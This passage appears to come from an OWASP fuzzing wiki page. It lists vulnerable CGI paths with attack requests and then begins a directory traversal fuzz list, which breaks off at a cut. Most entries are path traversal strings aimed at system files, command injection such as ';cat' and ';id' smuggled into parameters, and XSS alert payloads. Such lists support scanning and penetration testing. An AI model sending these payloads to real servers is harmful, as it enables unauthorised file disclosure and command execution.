nph-emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
nph-error.pl&lt;br /&gt;
nph-exploitscanget.cgi&lt;br /&gt;
nph-maillist.pl&lt;br /&gt;
nph-publish&lt;br /&gt;
nph-publish.cgi&lt;br /&gt;
nph-showlogs.pl?files=../../&amp;amp;filter=.*&amp;amp;submit=Go&amp;amp;linecnt=500&amp;amp;refresh=0&lt;br /&gt;
nph-test-cgi&lt;br /&gt;
ntitar.pl&lt;br /&gt;
opendir.php?{KNOWNFILE}&lt;br /&gt;
orders/orders.txt&lt;br /&gt;
pagelog.cgi&lt;br /&gt;
pals-cgi?palsAction=restart&amp;amp;documentName={KNOWNFILE}&lt;br /&gt;
parse-file&lt;br /&gt;
pass&lt;br /&gt;
passwd&lt;br /&gt;
passwd.txt&lt;br /&gt;
password&lt;br /&gt;
pbcgi.cgi?name=Joe%Camel&amp;amp;email=%3C&lt;br /&gt;
perl&lt;br /&gt;
perl?-v&lt;br /&gt;
perlshop.cgi&lt;br /&gt;
pfdispaly.cgi?'%0A/bin/cat%20{KNOWNFILE}|'&lt;br /&gt;
pfdispaly.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
pfdisplay.cgi?'%0A/bin/cat%20{KNOWNFILE}|'&lt;br /&gt;
phf&lt;br /&gt;
phf.cgi?QALIA&lt;br /&gt;
phf?Qname=root%0Acat%20{KNOWNFILE}%20&lt;br /&gt;
photo/&lt;br /&gt;
photo/manage.cgi&lt;br /&gt;
photo/protected/manage.cgi&lt;br /&gt;
php-cgi&lt;br /&gt;
php.cgi?{KNOWNFILE}&lt;br /&gt;
plusmail&lt;br /&gt;
pollit/Poll_It_&lt;br /&gt;
pollssi.cgi&lt;br /&gt;
post-query&lt;br /&gt;
post_query&lt;br /&gt;
postcards.cgi&lt;br /&gt;
powerup/r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
printenv&lt;br /&gt;
printenv.tmp&lt;br /&gt;
probecontrol.cgi?command=enable&amp;amp;username=cancer&amp;amp;password=killer&lt;br /&gt;
processit.pl&lt;br /&gt;
profile.cgi&lt;br /&gt;
pu3.pl&lt;br /&gt;
publisher/search.cgi?dir=jobs&amp;amp;template=;cat%20{KNOWNFILE}|&amp;amp;output_number=10&lt;br /&gt;
query&lt;br /&gt;
query?mss=%2e%2e/config&lt;br /&gt;
quickstore.cgi?page=../../../../../../../../../..{KNOWNFILE}%00html&amp;amp;cart_id=&lt;br /&gt;
quikstore.cfg&lt;br /&gt;
quizme.cgi&lt;br /&gt;
r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ratlog.cgi&lt;br /&gt;
redirect&lt;br /&gt;
register.cgi&lt;br /&gt;
replicator/webpage.cgi/&lt;br /&gt;
responder.cgi&lt;br /&gt;
retrieve_password.pl&lt;br /&gt;
rksh&lt;br /&gt;
rmp_query&lt;br /&gt;
robadmin.cgi&lt;br /&gt;
robpoll.cgi&lt;br /&gt;
rpm_query&lt;br /&gt;
rsh&lt;br /&gt;
rtm.log&lt;br /&gt;
rwcgi60&lt;br /&gt;
rwcgi60/showenv&lt;br /&gt;
rwwwshell.pl&lt;br /&gt;
sawmill5?rfcf+%22{KNOWNFILE}%22+spbn+1,1,21,1,1,1,1&lt;br /&gt;
sawmill?rfcf+%22&lt;br /&gt;
sbcgi/sitebuilder.cgi&lt;br /&gt;
scoadminreg.cgi&lt;br /&gt;
scripts/*%0a.pl&lt;br /&gt;
search.cgi&lt;br /&gt;
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini&lt;br /&gt;
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini&lt;br /&gt;
search.php?searchstring=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
search.pl&lt;br /&gt;
search.pl?Realm=All&amp;amp;Match=0&amp;amp;Terms=test&amp;amp;nocpp=1&amp;amp;maxhits=10&amp;amp;;Rank=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
search.pl?form=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
search/search.cgi?keys=*&amp;amp;prc=any&amp;amp;catigory=../../../../../../../../../../../../etc&lt;br /&gt;
sendform.cgi&lt;br /&gt;
sendpage.pl?message=test\;/bin/ls%20/etc;echo%20\message&lt;br /&gt;
sendtemp.pl?templ=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
session/adminlogin&lt;br /&gt;
sewse?/home/httpd/html/sewse/jabber/comment2.jse+{KNOWNFILE}&lt;br /&gt;
sh&lt;br /&gt;
shop.cgi?page=../../../../../../..{KNOWNFILE}&lt;br /&gt;
shop.pl/page=;cat%20shop.pl|&lt;br /&gt;
shop/auth_data/auth_user_file.txt&lt;br /&gt;
shop/orders/orders.txt&lt;br /&gt;
shopper.cgi?newpage=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
shopplus.cgi?dn=domainname.com&amp;amp;cartid=%CARTID%&amp;amp;file=;cat%20{KNOWNFILE}|&lt;br /&gt;
show.pl&lt;br /&gt;
showcheckins.cgi?person=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
showuser.cgi&lt;br /&gt;
simple/view_page?mv_arg=|cat%20{KNOWNFILE}|&lt;br /&gt;
simplestguest.cgi&lt;br /&gt;
simplestmail.cgi&lt;br /&gt;
smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
smartsearch/smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
sojourn.cgi?cat=../../../../../../../../../../etc/password%00&lt;br /&gt;
spin_client.cgi?aaaaaaaa&lt;br /&gt;
ss&lt;br /&gt;
sscd_suncourier.pl&lt;br /&gt;
ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e{KNOWNFILE}&lt;br /&gt;
start.cgi/%3Cscript%3Ealert('XSS');%3C/script%3E&lt;br /&gt;
stat.pl&lt;br /&gt;
stat/&lt;br /&gt;
stats-bin-p/reports/index.html&lt;br /&gt;
stats.pl&lt;br /&gt;
stats.prf&lt;br /&gt;
stats/&lt;br /&gt;
stats/statsbrowse.asp?filepath=c:\&amp;amp;Opt=3&lt;br /&gt;
stats_old/&lt;br /&gt;
statsconfig&lt;br /&gt;
statusconfig.pl&lt;br /&gt;
statview.pl&lt;br /&gt;
store.cgi?&lt;br /&gt;
store/agora.cgi?cart_id=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
store/agora.cgi?page=whatever33.html&lt;br /&gt;
store/index.cgi?page=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
story.pl?next=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
story/story.pl?next=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
survey&lt;br /&gt;
survey.cgi&lt;br /&gt;
sws/admin.html&lt;br /&gt;
sws/manager.pl&lt;br /&gt;
tablebuild.pl&lt;br /&gt;
talkback.cgi?article=../../../../../../../..{KNOWNFILE}%00&amp;amp;action=view&amp;amp;matchview=1&lt;br /&gt;
tcsh&lt;br /&gt;
technote/main.cgi?board=FREE_BOARD&amp;amp;command=down_load&amp;amp;filename=/../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
test-cgi.tcl&lt;br /&gt;
test-cgi?/*&lt;br /&gt;
test-env&lt;br /&gt;
test.cgi&lt;br /&gt;
test/test.cgi&lt;br /&gt;
texis/junk&lt;br /&gt;
texis/phine&lt;br /&gt;
textcounter.pl&lt;br /&gt;
tidfinder.cgi&lt;br /&gt;
tigvote.cgi&lt;br /&gt;
title.cgi&lt;br /&gt;
tpgnrock&lt;br /&gt;
traffic.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
troops.cgi&lt;br /&gt;
ttawebtop.cgi/?action=start&amp;amp;pg=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ultraboard.cgi&lt;br /&gt;
ultraboard.pl&lt;br /&gt;
unlg1.1&lt;br /&gt;
unlg1.2&lt;br /&gt;
update.dpgs&lt;br /&gt;
upload.cgi&lt;br /&gt;
uptime&lt;br /&gt;
urlcount.cgi?%3CIMG%20&lt;br /&gt;
ustorekeeper.pl?command=goto&amp;amp;file=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
utm/admin&lt;br /&gt;
utm/utm_stat&lt;br /&gt;
view-source&lt;br /&gt;
view-source?view-source&lt;br /&gt;
view_item?HTML_FILE=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
viewcvs.cgi/viewcvs/?cvsroot=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\&lt;br /&gt;
viewlogs.pl&lt;br /&gt;
viewsource?{KNOWNFILE}&lt;br /&gt;
viralator.cgi&lt;br /&gt;
virgil.cgi&lt;br /&gt;
vote.cgi&lt;br /&gt;
vpasswd.cgi&lt;br /&gt;
vq/demos/respond.pl?&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
w3-msql&lt;br /&gt;
w3-sql&lt;br /&gt;
wais.pl&lt;br /&gt;
way-board.cgi?db={KNOWNFILE}%00&lt;br /&gt;
way-board/way-board.cgi?db={KNOWNFILE}%00&lt;br /&gt;
webais&lt;br /&gt;
webbbs.cgi&lt;br /&gt;
webbbs/webbbs_config.pl?name=joe&amp;amp;email=test@example.com&amp;amp;body=aaaaffff&amp;amp;followup=10;cat%20{KNOWNFILE}&lt;br /&gt;
webcart/webcart.cgi?CONFIG=mountain&amp;amp;CHANGE=YE&lt;br /&gt;
webdist.cgi?distloc=;cat%20{KNOWNFILE}&lt;br /&gt;
webdriver&lt;br /&gt;
webgais&lt;br /&gt;
webif.cgi&lt;br /&gt;
webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
webmap.cgi&lt;br /&gt;
webnews.pl&lt;br /&gt;
webplus?about&lt;br /&gt;
webplus?script=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
websendmail&lt;br /&gt;
webspirs.cgi?sp.nextform=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
webutil.pl&lt;br /&gt;
webutils.pl&lt;br /&gt;
webwho.pl&lt;br /&gt;
where.pl?sd=ls%20/etc&lt;br /&gt;
whois.cgi?action=load&amp;amp;whois=%3Bid&lt;br /&gt;
whois.cgi?lookup=;&amp;amp;ext=/bin/cat%20{KNOWNFILE}&lt;br /&gt;
whois/whois.cgi?lookup=;&amp;amp;ext=/bin/cat%20{KNOWNFILE}&lt;br /&gt;
whois_raw.cgi?fqdn=%0Acat%20{KNOWNFILE}&lt;br /&gt;
windmail&lt;br /&gt;
wrap&lt;br /&gt;
wrap.cgi&lt;br /&gt;
ws_ftp.ini&lt;br /&gt;
www-sql&lt;br /&gt;
wwwadmin.pl&lt;br /&gt;
wwwboard.cgi.cgi&lt;br /&gt;
wwwboard.pl&lt;br /&gt;
wwwstats.pl&lt;br /&gt;
wwwthreads/3tvars.pm&lt;br /&gt;
wwwthreads/w3tvars.pm&lt;br /&gt;
wwwwais&lt;br /&gt;
zml.cgi?file=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
zsh&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Generic 8 Directory Deep Traversal Fuzz (17 March 2010 - Total Statements: 879) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Generic 8 Directory Deep Traversal Fuzz (17 March 2010) &lt;br /&gt;
# Derived from the awesome &amp;quot;Directory Traversal Fuzzing Code&amp;quot; v0.2 by Luca Carettoni&lt;br /&gt;
# Did some cleanup &amp;amp; removed anything to the right of {FILE} for inclusion in a&lt;br /&gt;
# separate fuzzfile for more flexibiity, for the OWASP Fuzzing Code Database. &lt;br /&gt;
# adam.muntner@uietmove.com &lt;br /&gt;
&lt;br /&gt;
../{FILE}&lt;br /&gt;
../../{FILE}&lt;br /&gt;
../../../{FILE}&lt;br /&gt;
../../../../{FILE}&lt;br /&gt;
../../../../../{FILE}&lt;br /&gt;
../../../../../../{FILE}&lt;br /&gt;
../../../../../../../{FILE}&lt;br /&gt;
../../../../../../../../{FILE}&lt;br /&gt;
..%2f{FILE}&lt;br /&gt;
..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
..%252f{FILE}&lt;br /&gt;
..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\{FILE}&lt;br /&gt;
..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%255c{FILE}&lt;br /&gt;
..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
